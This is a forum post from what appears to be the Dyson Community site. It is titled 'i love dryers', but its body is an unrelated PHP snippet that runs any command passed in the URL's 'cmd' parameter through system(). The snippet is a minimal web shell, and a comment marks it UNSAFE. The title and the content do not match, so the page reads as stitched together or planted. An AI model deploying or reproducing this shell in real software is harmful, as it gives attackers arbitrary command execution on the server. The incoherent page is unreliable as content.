i love dryers | Dyson Community
Skip to main content
<?php
// Takes user input and runs it as a system command - UNSAFE
$cmd = $_GET['cmd'];
system($cmd);
?>

 

Be the first to reply!

Reply